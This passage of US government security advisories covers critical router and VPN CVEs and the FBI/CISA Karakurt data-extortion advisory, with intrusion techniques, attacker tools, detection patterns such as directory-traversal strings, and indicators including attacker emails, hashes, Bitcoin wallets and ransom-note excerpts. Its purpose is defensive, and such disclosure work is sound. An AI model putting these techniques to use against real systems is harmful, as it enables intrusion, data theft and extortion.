- NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
References
https://support.citrix.com/article/CTX267027
Table 6: Information on DrayTek CVE-2020-8515
DrayTek CVE-2020-8515 CVSS 3.0: 9.8 (Critical)Vulnerability Description
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
Recommended Mitigations- Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.
- Disable the remote access on your router if you don’t need it.
- Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.
- Always back up your config before doing an upgrade.
- After upgrading, check that the web interface now shows the new firmware version.
- Enable syslog logging for monitoring if there are abnormal events.
- Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
- Check if any ACL (Access Control Lists) have been altered.
- This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.
References
https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
Table 7: Information on D-Link CVE-2019-16920
D-Link CVE-2019-16920 CVSS 3.0: 9.8 (Critical)Vulnerability Description
Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
Recommended Mitigations- Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
- HTTP packet inspection to look for arbitrary input to the “ping_test” command
- DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82
References
https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079
Table 8: Information on Fortinet CVE-2018-13382
Fortinet CVE-2018-13382 CVSS 3.0: 7.5 (High)Vulnerability Description
An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
Recommended Mitigations- Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
- SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
- Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
- Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.
- HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification
Vulnerable Technologies and Versions
This vulnerability affects the following products:
- Fortinet FortiOS 6.0.0 to 6.0.4
- Fortinet FortiOS 5.6.0 to 5.6.8
- Fortinet FortiOS 5.4.1 to 5.4.10
- Fortinet FortiProxy 2.0.0
- Fortinet FortiProxy 1.2.8 and below
- Fortinet FortiProxy 1.1.6 and below
- Fortinet FortiProxy 1.0.7 and below
FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.
References
https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231
Table 9: Information on Mikrotik CVE-2018-14847
Mikrotik CVE-2018-14847 CVSS 3.0: 9.1 (Critical)Vulnerability Description
MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
Recommended Mitigations- Upgrade WinBox and RouterOS and change passwords
- Firewall the WinBox port from the public interface and from untrusted networks
- Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.
Vulnerable Technologies and Versions
This vulnerability affected the following MikroTik products:
- All bugfix releases from 6.30.1 to 6.40.7
- All current releases from 6.29 to 6.42
- All RC releases from 6.29rc1 to 6.43rc3
References
https://blog.mikrotik.com/security/winbox-vulnerability.html
Table 10: Information on Netgear CVE-2017-6862
Netgear CVE-2017-6862 CVSS 3.0: 9.8 (Critical)Vulnerability Description
NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.
Recommended Mitigations- NETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products.
- HTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized parameters.
Vulnerable Technologies and Versions
This vulnerability affects the following products:
- WNR2000v3 before version 1.1.2.14
- WNR2000v4 before version 1.0.0.66
- WNR2000v5 before version 1.0.0.42
- R2000
References
https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261
https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf
http://www.securityfocus.com/bid/98740
Table 11: Information on Pulse CVE-2019-11510
Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical)Vulnerability Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.
Recommended Mitigations- Upgrade to the latest Pulse Secure VPN.
- Stay alert to any scheduled tasks or unknown files/executables.
- Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.
Detection Methods
- CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
- Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.
Vulnerable Technologies and Versions
This vulnerability affects the following Pulse Connect Secure products:
- 9.0R1 to 9.0R3.3
- 8.3R1 to 8.3R7
- 8.2R1 to 8.2R12
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
Table 12: Information on Pulse CVE-2021-22893
Pulse CVE-2021-22893 CVSS 3.0: 10 (Critical)Vulnerability Description
Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
Recommended Mitigations- Updating such systems to PCS 9.1R11.4.
- Run the PCS Integrity Assurance utility.
- Enable Unauthenticated Request logging.
- Enable remote logging.
- Pulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other vulnerabilities.
- Monitor capabilities in open source scanners.
- Log correlation between the authentication servers responsible for LDAP and RADIUS authentication and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.
- The Pulse Security Check Tool.
- A ‘recovery’ file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=<varies>.
Vulnerable Technologies and Versions
This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
https://blog.pulsesecure.net/pulse-connect-secure-security-update/
https://kb.cert.org/vuls/id/213092
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html
Table 13: Information on QNAP CVE-2019-7192
QNAP CVE-2019-7192 CVSS 3.0: 9.8 (Critical)Vulnerability Description
This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1 Photo Station 6.0.3 and later
- QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
- QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
- QTS 4.2.6 Photo Station 5.2.11 and later
- N/A
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 14: Information on QNAP CVE- 2019-7193
QNAP CVE-2019-7193 CVSS 3.0: 9.8 (Critical)Vulnerability Description
This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the vulnerability, QNAP recommend updating QTS to their latest versions.
Recommended Mitigations
Update QTS to versions:
- QTS 4.4.1 build 20190918 and later
- QTS 4.3.6 build 20190919 and later
- N/A
Vulnerable Technologies and Versions
This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 15: Information on QNAP CVE-2019-7194
QNAP CVE-2019-7194 CVSS 3.0: 9.8 (Critical)Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1 Photo Station 6.0.3 and later
- QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
- QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
- QTS 4.2.6 Photo Station 5.2.11 and later
- N/A
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 16: Information on QNAP CVE-2019-7195
QNAP CVE-2019-7195 CVSS 3.0: 9.8 (Critical)Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1 Photo Station 6.0.3 and later
- QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
- QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
- QTS 4.2.6 Photo Station 5.2.11 and later
- N/A
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 17: Information on Zyxel CVE-2020-29583
Zyxel CVE-2020-29583 CVSS 3.0: 9.8 (Critical)Vulnerability Description
Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the SSH server or web interface with admin privileges.
Recommended Mitigations- Download latest patch (4.60 Patch1 or newer)
- Login attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems
Vulnerable Technologies and Versions
This vulnerability affects the following technologies and versions:
- ATP series running firmware ZLD V4.60
- USG series running firmware ZLD V4.60
- USG FLEX series running firmware ZLD V4.60
- VPN series running firmware ZLD V4.60
- NXC2500 running firmware V6.00 through V6.10
- NXC5500 running firmware V6.00 through V6.10
References
http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release
https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15
https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
https://www.zyxel.com/support/CVE-2020-29583.shtml
https://www.zyxel.com/support/security_advisories.shtml
Revisions
- Initial Version: June 7, 2022
This product is provided subject to this Notification and this Privacy & Use policy.
Vulnerability in Spring Framework Affecting Cisco Products: March 2022
Security Impact Rating: Critical
CVE: CVE-2022-22965
Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Cross-Site Request Forgery Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20774
AA22-152A: Karakurt Data Extortion Group
Summary
Actions to take today to mitigate cyber threats from ransomware:
• Prioritize patching known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enforce multifactor authentication.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury (Treasury), and the Financial Crimes Enforcement Network (FinCEN) are releasing this joint Cybersecurity Advisory (CSA) to provide information on the Karakurt data extortion group, also known as the Karakurt Team and Karakurt Lair. Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
Karakurt actors have typically provided screenshots or copies of stolen file directories as proof of stolen data. Karakurt actors have contacted victims’ employees, business partners, and clients [T1591.002] with harassing emails and phone calls to pressure the victims to cooperate. The emails have contained examples of stolen data, such as social security numbers, payment accounts, private company emails, and sensitive business data belonging to employees or clients. Upon payment of ransoms, Karakurt actors have provided some form of proof of deletion of files and, occasionally, a brief statement explaining how the initial intrusion occurred.
Prior to January 5, 2022, Karakurt operated a leaks and auction website found at https://karakurt[.]group. The domain and IP address originally hosting the website went offline in the spring 2022. The website is no longer accessible on the open internet, but has been reported to be located elsewhere in the deep web and on the dark web. As of May 2022, the website contained several terabytes of data purported to belong to victims across North America and Europe, along with several “press releases” naming victims who had not paid or cooperated, and instructions for participating in victim data “auctions.”
Download the PDF version of this report (pdf, 569kb).
Technical DetailsInitial IntrusionKarakurt does not appear to target any specific sectors, industries, or types of victims. During reconnaissance [TA0043], Karakurt actors appear to obtain access to victim devices primarily:
- By purchasing stolen login credentials [T1589.001] [T1589.002];
- Via cooperating partners in the cybercrime community, who provide Karakurt access to already compromised victims; or
- Through buying access to already compromised victims via third-party intrusion broker networks [T1589.001].
- Note: Intrusion brokers, or intrusion broker networks, are malicious individual cyber actors or groups of actors who use a variety of tools and skills to obtain initial access to—and often create marketable persistence within—protected computer systems. Intrusion brokers then sell access to these compromised computer systems to other cybercriminal actors, such as those engaged in ransomware, business email compromise, corporate and government espionage, etc.
Common intrusion vulnerabilities exploited for initial access [TA001] in Karakurt events include the following:
- Outdated SonicWall SSL VPN appliances [T1133] are vulnerable to multiple recent CVEs
- Log4j “Log4Shell” Apache Logging Services vulnerability (CVE-2021-44228) [T1190]
- Phishing and spearphishing [T1566]
- Malicious macros within email attachments [T1566.001]
- Stolen virtual private network (VPN) or Remote Desktop Protocol (RDP) credentials [T1078]
- Outdated Fortinet FortiGate SSL VPN appliances [T1133]/firewall appliances [T1190] are vulnerable to multiple recent CVEs
- Outdated and/or unserviceable Microsoft Windows Server instances
Upon developing or obtaining access to a compromised system, Karakurt actors deploy Cobalt Strike beacons to enumerate a network [T1083], install Mimikatz to pull plain-text credentials [T1078], use AnyDesk to obtain persistent remote control [T1219], and utilize additional situation-dependent tools to elevate privileges and move laterally within a network.
Karakurt actors then compress (typically with 7zip) and exfiltrate large sums of data—and, in many cases, entire network-connected shared drives in volumes exceeding 1 terabyte (TB)—using open source applications and File Transfer Protocol (FTP) services [T1048], such as Filezilla, and cloud storage services including rclone and Mega.nz [T1567.002].
ExtortionFollowing the exfiltration of data, Karakurt actors present the victim with ransom notes by way of “readme.txt” files, via emails sent to victim employees over the compromised email networks, and emails sent to victim employees from external email accounts. The ransom notes reveal the victim has been hacked by the “Karakurt Team” and threaten public release or auction of the stolen data. The instructions include a link to a TOR URL with an access code. Visiting the URL and inputting the access code open a chat application over which victims can negotiate with Karakurt actors to have their data deleted.
Karakurt victims have reported extensive harassment campaigns by Karakurt actors in which employees, business partners, and clients receive numerous emails and phone calls warning the recipients to encourage the victims to negotiate with the actors to prevent the dissemination of victim data. These communications often included samples of stolen data—primarily personally identifiable information (PII), such as employment records, health records, and financial business records.
Victims who negotiate with Karakurt actors receive a “proof of life,” such as screenshots showing file trees of allegedly stolen data or, in some cases, actual copies of stolen files. Upon reaching an agreement on the price of the stolen data with the victims, Karakurt actors provided a Bitcoin address—usually a new, previously unused address—to which ransom payments could be made. Upon receiving the ransom, Karakurt actors provide some form of alleged proof of deletion of the stolen files, such as a screen recording of the files being deleted, a deletion log, or credentials for a victim to log into a storage server and delete the files themselves.
Although Karakurt’s primary extortion leverage is a promise to delete stolen data and keep the incident confidential, some victims reported Karakurt actors did not maintain the confidentiality of victim information after a ransom was paid. Note: the U.S. government strongly discourages the payment of any ransom to Karakurt threat actors, or any cyber criminals promising to delete stolen files in exchange for payments.
In some cases, Karakurt actors have conducted extortion against victims previously attacked by other ransomware variants. In such cases, Karakurt actors likely purchased or otherwise obtained previously stolen data. Karakurt actors have also targeted victims at the same time these victims were under attack by other ransomware actors. In such cases, victims received ransom notes from multiple ransomware variants simultaneously, suggesting Karakurt actors purchased access to a compromised system that was also sold to another ransomware actor.
Karakurt actors have also exaggerated the degree to which a victim had been compromised and the value of data stolen. For example, in some instances, Karakurt actors claimed to steal volumes of data far beyond the storage capacity of compromised systems or claimed to steal data that did not belong to the victim.
Email mark.hubert1986@gmail.com; karakurtlair@gmail.com; personal.information.reveal@gmail.com; ripidelfun1986@protonmail.com; gapreappballye1979@protonmail.com; confedicial.datas.download@protonmail.com; armada.mitchell94@protonmail.com Protonmail email accounts in the following formats:
victimname_treasure@protonmail.com
victimname_jewels@protonmail.com
victimname_files@protonmail.com
Tools Onion site https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion Tools Rclone.exe;; AnyDesk.exe; Mimikatz Ngrok SSH tunnel application SHA256 - 3e625e20d7f00b6d5121bb0a71cfa61f92d658bcd61af2cf5397e0ae28f4ba56 DDLs masquerading as legitimate Microsoft binaries to System32 Mscxxx.dll: SHA1 - c33129a680e907e5f49bcbab4227c0b02e191770
Msuxxx.dll: SHA1 - 030394b7a2642fe962a7705dcc832d2c08d006f5 Msxsl.exe Legitimate Microsoft Command Line XSL Transformation Utility SHA1 - 8B516E7BE14172E49085C4234C9A53C6EB490A45 dllhosts.exe Rclone SHA1 - fdb92fac37232790839163a3cae5f37372db7235 rclone.conf Rclone configuration file filter.txt Rclone file extension filter file c.bat UNKNOWN 3.bat UNKNOWN Potential malicious document SHA1 - 0E50B289C99A35F4AD884B6A3FFB76DE4B6EBC14
.
Tools Potential malicious document SHA1 - 7E654C02E75EC78E8307DBDF95E15529AAAB5DFF Malicious text file SHA1 - 4D7F4BB3A23EAB33A3A28473292D44C5965DDC95 Malicious text file SHA1 - 10326C2B20D278080AA0CA563FC3E454A85BB32FCobalt Strike hashes SHA256 - 563BC09180FD4BB601380659E922C3F7198306E0CAEBE99CD1D88CD2C3FD5C1B SHA256 - 5E2B2EBF3D57EE58CADA875B8FBCE536EDCBBF59ACC439081635C88789C67ACA SHA256 - 712733C12EA3B6B7A1BCC032CC02FD7EC9160F5129D9034BF9248B27EC057BD2 SHA256 - 563BC09180FD4BB601380659E922C3F7198306E0CAEBE99CD1D88CD2C3FD5C1B SHA256 - 5E2B2EBF3D57EE58CADA875B8FBCE536EDCBBF59ACC439081635C88789C67ACA SHA256 - 712733C12EA3B6B7A1BCC032CC02FD7EC9160F5129D9034BF9248B27EC057BD2 SHA1 - 86366bb7646dcd1a02700ed4be4272cbff5887af
Ransom note text sample:
Here's the deal
We breached your internal network and took control over all of your systems.
2.
We analyzed and located each piece of more-or-less important files while spending weeks inside.3.
We exfiltrated anything we wanted (xxx GB (including Private & Confidential information, Intellectual Property, Customer Information and most important Your TRADE SECRETS)Ransom note text sample:
FAQ:
Who the hell are you?
Who the hell are you?Payment Wallets: bc1qfp3ym02dx7m94td4rdaxy08cwyhdamefwqk9hp bc1qw77uss7stz7y7kkzz7qz9gt7xk7tfet8k30xax bc1q8ff3lrudpdkuvm3ehq6e27nczm393q9f4ydlgt bc1qenjstexazw07gugftfz76gh9r4zkhhvc9eeh47 bc1qxfqe0l04cy4qgjx55j4qkkm937yh8sutwhlp4c bc1qw77uss7stz7y7kkzz7qz9gt7xk7tfet8k30xax bc1qrtq27tn34pvxaxje4j33g3qzgte0hkwshtq7sq bc1q25km8usscsra6w2falmtt7wxyga8tnwd5s870g bc1qta70dm5clfcxp4deqycxjf8l3h4uymzg7g6hn5 bc1qrkcjtdjccpy8t4hcna0v9asyktwyg2fgdmc9al bc1q3xgr4z53cdaeyn03luhen24xu556y5spvyspt8 bc1q6s0k4l8q9wf3p9wrywf92czrxaf9uvscyqp0fu bc1qj7aksdmgrnvf4hwjcm5336wg8pcmpegvhzfmhw bc1qq427hlxpl7agmvffteflrnasxpu7wznjsu02nc bc1qz9a0nyrqstqdlr64qu8jat03jx5smxfultwpm0 bc1qq9ryhutrprmehapvksmefcr97z2sk3kdycpqtr bc1qa5v6amyey48dely2zq0g5c6se2keffvnjqm8ms bc1qx9eu6k3yhtve9n6jtnagza8l2509y7uudwe9f6 bc1qtm6gs5p4nr0y5vugc93wr0vqf2a0q3sjyxw03w bc1qta70dm5clfcxp4deqycxjf8l3h4uymzg7g6hn5 bc1qx9eu6k3yhtve9n6jtnagza8l2509y7uudwe9f6 bc1qqp73up3xff6jz267n7vm22kd4p952y0mhcd9c8 bc1q3xgr4z53cdaeyn03luhen24xu556y5spvyspt8 Mitre Att&ck Techniques
Karakurt actors use the ATT&CK techniques listed in table 1.
Table 1: Karakurt actors ATT&CK techniques for enterprise
Reconnaissance Technique Title ID Use Gather Victim Identify Information: Credentials T1589.001 Karakurt actors have purchased stolen login credentials. Gather Victim Identity Information: Email Addresses Karakurt actors have purchased stolen login credentials including email addresses. Gather Victim Org Information: Business Relationships T1591.002 Karakurt actors have leveraged victims' relationships with business partners. Initial Access Technique Title ID Use Exploit Public-Facing Applications T1190 Karakurt actors have exploited the Log4j "Log4Shell" Apache Logging Service vulnerability and vulnerabilities in outdated firewall appliances for gaining access to victims' networks. External Remote Services T1133 Karakurt actors have exploited vulnerabilities in outdated VPN appliances for gaining access to victims' networks. Phishing T1566 Karakurt actors have used phishing and spearphishing to obtain access to victims' networks. Phishing – Spearphishing Attachment T1566.001 Karakurt actors have sent malicious macros as email attachments to gain initial access. Valid Accounts T1078 Karakurt actors have purchased stolen credentials, including VPN and RDP credentials, to gain access to victims' networks. Privilege Escalation Technique Title ID Use Valid Accounts T1078 Karakurt actors have installed Mimikatz to pull plain-text credentials. Technique Title ID Use File and Directory Discovery T1083 Karakurt actors have deployed Cobalt Strike beacons to enumerate a network. Technique Title ID Use Remote Access Software T1219 Karakurt actors have used AnyDesk to obtain persistent remote control of victims' systems. Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Karakurt actors have used FTP services, including Filezilla, to exfiltrate data from victims' networks. Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Karakurt actors have used rclone and Mega.nz to exfiltrate data stolen from victims' networks.Mitigations
- Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
- Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.
- Regularly back up data and password protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
- Install and regularly update antivirus software on all hosts and enable real time detection.
- Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
- Review domain controllers, servers, workstations, and active directories for new or unrecognized accounts.
- Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
- Disable unused ports.
- Consider adding an email banner to emails received from outside your organization.
- Disable hyperlinks in received emails.
- Enforce multi-factor authentication.
- Use National Institute for Standards and Technology (NIST) standards for developing and managing password policies.
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;
- Store passwords in hashed format using industry-recognized password managers;
- Add password user “salts” to shared login credentials;
- Avoid reusing passwords;
- Implement multiple failed login attempt account lockouts;
- Disable password “hints”;
- Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
- Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
- Focus on cyber security awareness and training. Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities (i.e., ransomware and phishing scams).
- For additional resources related to the prevention and mitigation of ransomware, visit Stopransomware.gov as well as the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and NIST’s Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events. Stopransomware.gov is the U.S. government’s one-stop location for resources to tackle ransomware more effectively.
- CISA’s Ransomware Readiness Assessment is a no-cost self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.
- CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware.
- Financial Institutions must also ensure compliance with any applicable Bank Secrecy Act requirements, including suspicious activity reporting obligations. Indicators of Compromise, such as suspicious email addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. For more information on mandatory and voluntary reporting of cyber events via suspicious activity reports (SARs), see FinCEN Advisory FIN-2016-A005, Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime, October 25, 2016, and FinCEN Advisory FIN-2021-A004, Advisory on Ransomware and the Use of the Financial System to Facilitate Ransom Payments, November 8, 2021, which updates FinCEN Advisory FIN-2020-A006.
- The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
- Initial Version: June 01, 2022
This product is provided subject to this Notification and this Privacy & Use policy.
Pages
